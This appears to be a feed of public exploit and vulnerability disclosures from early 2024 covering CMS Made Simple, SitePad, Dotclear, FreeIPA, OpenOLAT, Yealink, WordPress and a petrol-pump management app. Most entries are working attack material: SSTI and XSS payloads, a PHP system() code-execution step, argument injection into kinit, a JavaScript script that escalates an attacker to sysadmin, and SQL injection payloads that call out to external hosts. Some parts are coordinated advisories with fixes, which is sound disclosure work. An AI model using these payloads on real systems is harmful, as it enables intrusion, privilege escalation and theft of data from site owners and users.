<pre><code># Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cmsmadesimple.org/<br /># Version: 2.2.19<br /># Tested on: https://www.softaculous.com/demos/CMS_Made_Simple<br /><br /><br />1 ) log in as admin and go to Layout > Design Manager > Breadcrumbs<br />2 ) Click edit and write SSTI payload : {7*7} , {$smarty.version},{{7*7}} <br />3 ) After click Apply > Submit<br />4 ) Go to home page > https://127.0.0.1/CMS_Made_Simple/index.php?page=templates-and-stylesheets<br />will be see : 49 class="breadcrumbs"<br /><br /></code></pre>
<pre><code># Exploit Title: CMS Made Simple Version: 2.2.19 - Stored XSS<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cmsmadesimple.org/<br /># Version: 2.2.19<br /># Tested on: https://www.softaculous.com/demos/CMS_Made_Simple<br /><br /><br />1 ) log in as admin and go to Content > File Manager <br />2 ) Write in New directory: place payload "><img src=x onerrora=confirm() onerror=confirm(1)><br />3 ) After click run you will be see alertbox <br /><br /></code></pre>
<pre><code># Exploit Title: CMS Made Simple Version: 2.2.19 - Remote Code Execution<br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cmsmadesimple.org/<br /># Version: 2.2.19<br /># Tested on: https://www.softaculous.com/demos/CMS_Made_Simple<br /><br /><br />1 ) log in as admin and go to Extensions > User Defined Tags ><br />2 ) Write in Code place payload > <?php echo system('id'); ?><br />3 ) After click run you will be see result :<br />uid=1000(admin) gid=1000(admin) groups=1000(admin) uid=1000(admin) gid=1000(admin) groups=1000(admin)<br /></code></pre>
<pre><code># Exploit Title: SitePad Version : 1.8.2 - Stored XSS <br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://sitepad.com/<br /># Version : 1.8.2<br /># Tested on: https://www.softaculous.com/apps/blogs/SitePad<br /><br /><br />1 ) Go to Templates > Header > Edit Pagelayer Template<br />2 ) Write in Name : "><img src=x onerrora=confirm() onerror=confirm(1)><br />3) After save and refresh page will be see alert button https://127.0.0.1/SitePad/site-admin/admin.php?page=pagelayer_template_wizard&post=9<br /></code></pre>
<pre><code># Exploit Title: Dotclear Version : 2.29 - Reflected XSS <br /># Date: 2024-21-02<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://dotclear.org/<br /># Version : 2.29<br /># Tested on: https://softaculous.com/demos/dotclear<br /><br />1 ) Enter admin panel after write search button this payload : "><img src=x onerrora=confirm() onerror=confirm(1)><br />2 ) https://127.0.0.1/Dotclear/admin/index.php?qx="><img src=x onerrora=confirm() onerror=confirm(1)>&process=Search<br />3 ) You will be see alert button<br /></code></pre>
<pre><code>Summary:<br />Specially crafted HTTP requests can read files in the DC server. And use keytab files for authorization for different kerberos principals.<br /><br />Tested FreeIPA version:<br />ipa-server-4.10.1<br /><br />Details<br />The "user" parameter in the HTTP URI "/sip/session/login_password" is inserted into the "run" function from the file "ipautil.py". Then it is passed as an argument to the "subprocess.Popen". As a result, the following list is passed: "args=['/usr/bin/kinit', '{user params}', '-c', /run/ipa/ccaches/kinit_13704', '-T', '/run/ipa/ccaches/armor_13704', '-C', '-E']". If instead of "{user params}" there is a string "-V", then it will be taken as an argument for "kinit". As a result, remote attackers can use options such as "-t", "-X", "-S" or "-I" for DOS, or use the keytab file from the system to log in under participants without a password.<br /><br />PoC (attached screenshots):<br />Simple request with "user=-H&password=0000000"<br />With multiple parameters "user=-Vkt&password=0000000"<br /><br />Impact<br />Possible DOS, use keytab from system and read files on DC.<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240220-0 ><br />=======================================================================<br /> title: Multiple Stored Cross-Site Scripting Vulnerabilities<br /> product: OpenOLAT (Frentix GmbH)<br /> vulnerable version: <= 18.1.4 and <= 18.1.5<br /> fixed version: 18.1.6 / 18.2<br /> CVE number: CVE-2024-25973, CVE-2024-25974<br /> impact: High<br /> homepage: https://www.openolat.com/<br /> found: 2023-12-20 and 2024-01-20<br /> by: Mike Klostermaier (Office Berlin)<br /> Johannes Völpel (Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"frentix operates in the areas of e-learning, software development, multimedia<br />and media production. Providing information and lasting impressions – we<br />try to reconcile this goal in the area of tension between technology, usability<br />and design."<br /><br />"The LMS OpenOlat is an internet-based learning platform for teaching, learning,<br />assessment and communication, an LMS, a learning management system."<br /><br />Source: https://www.openolat.com/unternehmen/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)<br />Insufficient filtering and sanitization of user input leads to the creation<br />of groups, courses and other resources that contain XSS payloads.<br />This allows an attacker to execute JavaScript code with the permissions of the<br />victim in the context of the user's browser.<br /><br />2) Privilege escalation via XSS due to insecure CSP<br />If the content security policy is not set securely and there is content on<br />the same page that can be manipulated by the attacker, a privilege<br />escalation can take place.<br /><br />3) Stored Cross-Site-Scripting within the Media Center (CVE-2024-25974)<br />Insufficient filtering and sanitization of malicious files uploaded by a user<br />leads to stored resources within the Media Center that could contain XSS payloads.<br />This allows an attacker to execute JavaScript code with the permissions of the<br />victim in the context of the user's browser.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)<br />Various XSS issues have been found in different functions of OpenOLAT.<br />The following examples show different attack scenarios.<br /><br />Example 1 - Stored Cross-Site-Scripting within Coursenames<br />Due to insufficient filtering and sanitization of user input, an attacker<br />with rights to create or edit groups can create a course with a name that<br />contains an XSS payload. When a user edits this course the name including<br />the payload is displayed and executed. Furthermore, the XSS payload is<br />executed when editing the course via the course-editor, within the course-editor's<br />"layout" tab inside the preview. This also happens multiple times at multiple<br />locations during the publishing workflow.<br /><br />The following payload was used as coursename:<br />```<br /><img src=x onerror=alert('from\u0020subcat\u0020title')><br />```<br /><br />Example 2 - Stored Cross-Site-Scripting within Catalogname<br />An attacker, who is authenticated with rights that allow creating or renaming<br />catalogs, is able to create a catalog (also called sub-category) with a name that<br />contains an XSS payload due to insufficient filtering and sanitization of user<br />input.<br />When a user publishes a course, the name of the catalog including the<br />payload is displayed and executed within the "Create catalog entry" tab<br />when selecting "Add to catalog".<br /><br />The following payload was used as the catalog name:<br />```<br /><img src=x onerror=alert('from\u0020subcat\u0020title')><br />```<br /><br />Example 3 - Stored Cross-Site-Scripting within Curriculum Management<br />An authenticated user of a role, who has the authorization to create<br />curriculums, is able to create curriculums, whose name contains a JavaScript<br />payload. These are shown to the members in some views where the JavaScript<br />payload is executed. To do this, navigate to the overview of the curriculums<br />via "Curriculum management".<br />A curriculum can be created via the "Create new curriculum" button in the<br />window that appears. To recreate the vulnerability, it is sufficient to<br />enter a JavaScript payload as the identifier.<br /><br />The following payload was used as curriculum name:<br />```<br /><img src=x onerror=alert('from\u0020subcat\u0020title')><br />```<br />When a user with sufficient rights opens the manipulated curriculum via the<br />"curriculum browser" within the "Curriculum management" the payload within<br />the curriculum name gets executed within the context of the user's browser.<br /><br /><br />Example 4 - Stored Cross-Site-Scripting within Alt-Text of Media-Files<br />An attacker, who is authenticated with rights that allow uploading files,<br />can upload media files via the "Media Centre" and enter metadata for these<br />files. One of the fields used for image metadata is the so-called alt-text<br />field, which is used to enter an alternative display text for image files.<br />This alternative text is not sanitized properly when entered during the upload<br />of files.<br /><br />The following payload was assigned to an image file as alt-text:<br />```<br />"><img src=a onerror=alert(document.location)><br />```<br /><br />The upload of the image file works without further problems and is confirmed.<br />After successfully uploading the image with a manipulated alt-text, the<br />transmitted payload is executed directly. Using the function to share content<br />with other users, this manipulated image can be shared to potential victims<br />(e.g. a system administrator). The user to whom the image has been shared with<br />can preview it in their media center. As soon as the user views the image details,<br />the JavaScript payload stored within the alt-text is executed in the context<br />of the victim's browser.<br /><br /><br />2) Privilege escalation due to unsafe-eval<br />If the content security policy is not set securely and there is content on the<br />same page that can be manipulated by the attacker, a privilege escalation<br />can take place. As the content security policy is set to "Report-Only" and<br />"unsafe-eval" is set by default in OpenOLAT, it can be possible to use the<br />following attack at least in most cases shown here using stored XSS.<br /><br />An example that loads a script from an external source was not used here,<br />as this would not have been possible with an activated CSP, whereas this<br />vulnerability can also be exploited with an activated standard CSP from<br />OpenOLAT.<br />The following example can be used at any given point where a XSS is possible<br />and another string can be manipulated within a readable context:<br />```<br />"><img src=x onerror='var ps = document.querySelectorAll(`p`); for (var i = 0; i<br />< ps.length; i++) { var c = ps[i].textContent; if (c.startsWith(`YXN`))<br />{ eval(atob(c)); } }'<br />```<br /><br />This JavaScript code searches the website for elements that begin<br />with a certain string (in our example "YXN"), decodes them from base64 and<br />executes them (due to the unsafe-eval policy) as JavaScript code.<br />This has been tested to be working with example 4 with the above payload<br />as the alt-text and the payload mentioned below as the description of the<br />media file.<br />The string "YXN" is the start of the base64-encoded following payload:<br />```<br />async function main() {<br /> function sleep(ms) {<br /> return new Promise(resolve => setTimeout(resolve, ms));<br /> }<br /> var n = 2000;<br /> var anchorElement = document.querySelector('a[title="Manage users and system groups"]');<br /> anchorElement.click();<br /> await sleep(n);<br /> var buttons = document.querySelectorAll('a[title="Organisations"]');<br /> buttons[0].click();<br /> await sleep(n);<br /> var links = document.querySelectorAll('a');<br /> var organisationLink = Array.from(links).find(function (link) {<br /> return link.textContent === 'OpenOLAT';<br /> });<br /> organisationLink.click();<br /> await sleep(n);<br /> var links = document.querySelectorAll('a');<br /> var chadLink = Array.from(links).find(function (link) {<br /> return link.textContent === 'Chad';<br /> });<br /> await sleep(n);<br /> chadLink.click();<br /> await sleep(n);<br /> var roleTabLinks = document.querySelectorAll('a[role="tab"]');<br /> var rolesLink = Array.from(roleTabLinks).find(function (link) {<br /> return link.textContent === 'Roles';<br /> });<br /> await sleep(n);<br /> rolesLink.click();<br /> await sleep(n);<br /> var inputElement = document.querySelector('input[value="administrator"]');<br /> inputElement.click();<br /> await sleep(n);<br /> var inputElement = document.querySelector('input[value="sysadmin"]');<br /> inputElement.click();<br /> await sleep(n);<br /> var saveButton = document.querySelector('button[value="Save"]');<br /> saveButton.click();<br />}<br />main();<br />```<br /><br />The code shown here utilizes the static structure of OpenOLAT. The use of<br />control elements is predictable, as long as the name of the organization used<br />within the OpenOLAT instance is known. This information is freely accessible to<br />every logged-in user. Lines 14 and 20 contain variables which must be adapted<br />to the corresponding OpenOLAT instance and attacker username. The executed<br />script searches for HTML elements with predictable names in order to navigate<br />to an administrative interface within the application and elevate the<br />attacker's rights to administrative level.<br /><br />The script works with two-second pauses between the individual actions<br />to ensure that all actions are only executed after the page has loaded. Even<br />if this is visible to the victim, the waiting times between the actions can be<br />optimized in a real attack and can also be used with the help of obfuscation<br />measures (e.g. additional windows that open and hide the actions).<br /><br /><br />3) Stored Cross-Site-Scripting (XSS) within the Media-Center (CVE-2024-25974)<br />It is possible to upload files within the Media Center of OpenOLAT version 18.1.5<br />as an authenticated user without any other rights.<br />While the filetypes are limited, an SVG containing an XSS payload can be<br />uploaded. The following content has been uploaded within a file<br />named 'xss.svg':<br />```<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /><script type="text/javascript"><br /> alert(document.location);<br /></script><br /></svg><br />```<br /><br />After a successful upload the file can be shared with groups of users.<br />By sharing the file with a group of which an administrator is part of, the<br />administrator can access the file and open it, which will open the file in a<br />new tab within the browser. This leads to the execution of the shown script and<br />will display a message window stating the current domain and path.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions has been tested which was the latest version available<br />at the time of the test:<br />* OpenOLAT 18.1.4 Vulnerability 1 and 2<br />* OpenOLAT 18.1.5 Vulnerability 3<br /><br />OpenOLAT version 18.2 was verified whether the identified issues were properly<br />fixed.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-10: Contacting vendor through contact@frentix.com<br />2024-01-10: Very quick vendor response within an hour, sending security<br /> advisory to provided contact.<br />2024-01-10: Feedback from vendor that we submitted known/already fixed issues<br /> for version 18.1.<br /> Retesting latest version 18.1.4, but only three of our submitted<br /> issues had been fixed before (removed from advisory), found<br /> additional, new XSS issues again in latest version.<br />2024-01-11: Sending updated security advisory to the vendor.<br />2024-01-11: Quick feedback from vendor declaring example 1 to 3 as accepted<br /> risk, as authors have a trusted position and XSS is only seen as<br /> a risk if the attacker is unauthenticated or has low privileges.<br /> Example 4 will be patched with the upcoming release. No comment<br /> from the vendor on vulnerability 2 regarding the unsafe default<br /> configuration.<br />2024-01-11: Sending examples 1 to 3 and explaining the risk potential from an<br /> attacker's perspective to the vendor. Co-ordination with the vendor<br /> regarding the release date of the new version, which includes a fix<br /> for example 4. Asking again about the standard configuration<br /> mentioned in vulnerability 2 and the vendor's position or judgement<br /> on this.<br />2024-01-11: Quick reply from the vendor confirming the release date of the new<br /> version on 2024-01-17. With regard to examples 1 to 3, the vendor<br /> confirmed that no fix is planned. Reference is made to modules in<br /> development which will replace the modules containing<br /> vulnerabilities in the course of upcoming releases. With regard<br /> to privilege escalation, which is enabled by the CSP in chapter 2,<br /> the vendor points out that the "unsafe-eval" or "unsafe-inline"<br /> option cannot simply be deactivated in the architecture currently<br /> in use. With regard to the "report-only" setting of the CSP, the<br /> vendor refers to the lack of possibilities to enforce this on<br /> the part of the vendor. However, the vendor advises customers to<br /> activate it.<br />2024-01-17: Release of version 18.1.5 by the vendor. A fix of example 1, 2 and 4<br /> was verified by the researchers within this version. Example 3 as<br /> well as the CSP from chapter 2 are still exploitable. The PoC code<br /> snipped has been redacted in example 3.<br />2024-01-18: Mail from vendor, informing us about the release of the patched<br /> version. Vendor states, that the development of OpenOLAT will use<br /> all points from this advisory as guidance for further improvements.<br />2024-01-19: Sending mail to vendor confirming that the examples 1, 2 and 4<br /> are fixed. Submitted updated draft of this advisory.<br />2024-01-21: Informing vendor about new found XSS within the Media Center, which<br /> has been added to this advisory as vulnerability 3 (SVG).<br />2024-01-21: Fast response from vendor informing us, that the found XSS will be<br /> fixed with an update at the end of January.<br />2024-01-23: Sending mail to the vendor thanking for the quick reply.<br />2024-01-31: Release of version 18.1.6 by the vendor.<br />2024-02-09: The researchers can confirm, that all vulnerabilities mentioned<br /> within chapters 1 and 3 are fixed and can no longer be exploited.<br /> Vulnerability 2 still works as documented. Informing the vendor,<br /> that we can confirm the fix and thanking again for the quick and<br /> solution-oriented communication.<br />2024-02-09: Vendor: Systematic search for further XSS issues, version 18.2.1<br /> contains even more fixes. Version 19 will have CSP enabled by<br /> default.<br />2024-02-13: Assigning CVE numbers.<br />2024-02-20: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provided a patched version 18.1.6 / 18.2 or higher which can be downloaded<br />from:<br />https://www.openolat.com/releases/<br /><br />Additionally, it is advised to set the Content-Security-Policy active, instead<br />of "Report-Only" as well as configuring it as strictly as possible. The upcoming<br />version 19 will enable CSP by default.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Johannes Völpel & Mike Klostermaier / @2024<br /><br /></code></pre>
<pre><code>CloudAware Security Advisory<br /><br />CVE-2024-24681: Insecure AES key in Yealink Configuration Encrypt Tool<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br />A single, vendorwide, hardcoded AES key in the configuration tool used to<br />encrypt provisioning documents was leaked leading to a compromise of<br />confidentiality of provisioning documents.<br /><br />========================================================================<br />Product<br />========================================================================<br />* Yealink Configuration Encrypt Tool (AES version)<br />* Yealink Configuration Encrypt Tool (RSA version <v1.2)<br /><br />========================================================================<br />Detailed description<br />========================================================================<br />The Yealink Configuration Encrypt Tool facilites provisioning and <br />configuration mangement<br />of Yealink products, such as VoIP phones. The tool created AES encrypted <br />provisioning<br />documents, containing configuration directives such as<br />username=user1<br />passwword=passw0rd!<br />serverhost=sip.host.com<br />callerid=+19051231212<br />The files created by this tool are then transferred to the Yealink <br />equipment. The equipment<br />decrypts the files and uses them to configure itself.<br />This process needs to be secure. So these files are encrypted.<br />The decryption is done by a static, hardcoded, key that is identical <br />across all installs and<br />customers. After decryption of this file by the hardcoded AES key <br />confidential information,<br />such as user passwords are visible in plain text.<br />This implies that knowledge of this hardcoded key allows for the <br />disclosure of sensitive<br />information from the configuration files, or that files with different <br />information can be<br />introduced and are axiomatically trusted by the phone.<br />As this key is static - this includes historic files from any customer <br />that used this tool.<br />The vendor has fixed this in version 1.2 of the Configuration Encrypt Tool.<br /><br />========================================================================<br />Solution<br />========================================================================<br />1) Upgrade Yealink Configuration Encrypt Tool to version 1.2<br />2) Evaluate the impact of the disclosure of any configurations rolled <br />out with<br />prior versions of this tool (including, specifically, the leaking of <br />passwords)<br /><br />========================================================================<br />Mitigation<br />========================================================================<br />1) If an upgrade is not an option - as `anyone' can create valid <br />configuration<br />files; ensure that affected equipment is unable to reach provisioning <br />servers.<br />2) Evaluate the impact of the disclosure of any configurations rolled <br />out prior<br />to these mitigation steps<br /><br />========================================================================<br />Weblinks<br />========================================================================<br />https://github.com/gitaware/CVE/tree/main/CVE-2024-24681<br /><br />========================================================================<br />History<br />========================================================================<br />early 2020, release of Configuration Encrypt Tool v1 containing RSA <br />encryption method<br />juli 2022, Yealink informed “old” AES key still present and working in tool<br />2023, new version of Configuration Encrypt Tool v1.2 without a hardcoded <br />AES<br />encryptionkey<br /></code></pre>
<pre><code># Title: wordpress 6.4.3 - Username Disclosure<br /># Author: h4shur<br /># date:2024-02-21<br /># Vendor Homepage: https://www.wordpress.org<br /># Software Link: https://www.wordpress.org/download<br /># Version: 6.4.3 and earlier<br /># Tested on: Windows 10 & Google Chrome<br /># Category : Web Application Bugs<br /><br />### Description :<br />the REST API allows simulating different request types. As such, we can<br />perform a POST request with the “users” string in the body of the request,<br />and tell the REST API to act like it’s received a GET request.<br />You can see the management username in the "slug" feature. And even<br />security plugins like "iThemes Security" do not block this path.<br /><br /><br />### POC :<br />https://target.com/wp-json/?rest_route=/wp/v2/users/<br /><br /># output :<br />[{"id":1,"name":"admin","url":"https:\/\/target.com<br />","description":"","link":"https:\/\/target.com<br />\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/<br />secure.gravatar.com<br />\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/<br />secure.gravatar.com<br />\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/<br />secure.gravatar.com<br />\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/<br />target.com<br />\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/<br />target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]<br /><br /><br />### Admin Panel :<br />https://target.com/wp-admin<br />https://target.com/login.php<br /><br /><br />### contact :<br />h4shursec@gmail.com<br />twitter.com/h4shur<br />instagram.com/h4shur<br />t.me/h4shur<br /></code></pre>
<pre><code>## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 02/21/24<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The email parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+'<br />was submitted in the email parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can receive very sensitive information<br />about this system by using these vulnerabilities!<br /><br />STATUS: HIGH-Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: email=-5782' OR 2852=2852 OR<br />'nYvi'='GjbH&password=h3I!y3o!F9&submit=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=mOsqQatz@burpcollaborator.net'+(select<br />load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''<br />AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT<br />(ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR<br />'BiVP'='cVHj&password=h3I!y3o!F9&submit=<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: email=mOsqQatz@burpcollaborator.net'+(select<br />load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECT<br />SLEEP(7)#&password=h3I!y3o!F9&submit=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=mOsqQatz@burpcollaborator.net'+(select<br />load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''<br />AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR<br />'Lshu'='MGpY&password=h3I!y3o!F9&submit=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html)<br /><br />## Time spent:<br />00:35:00<br /></code></pre>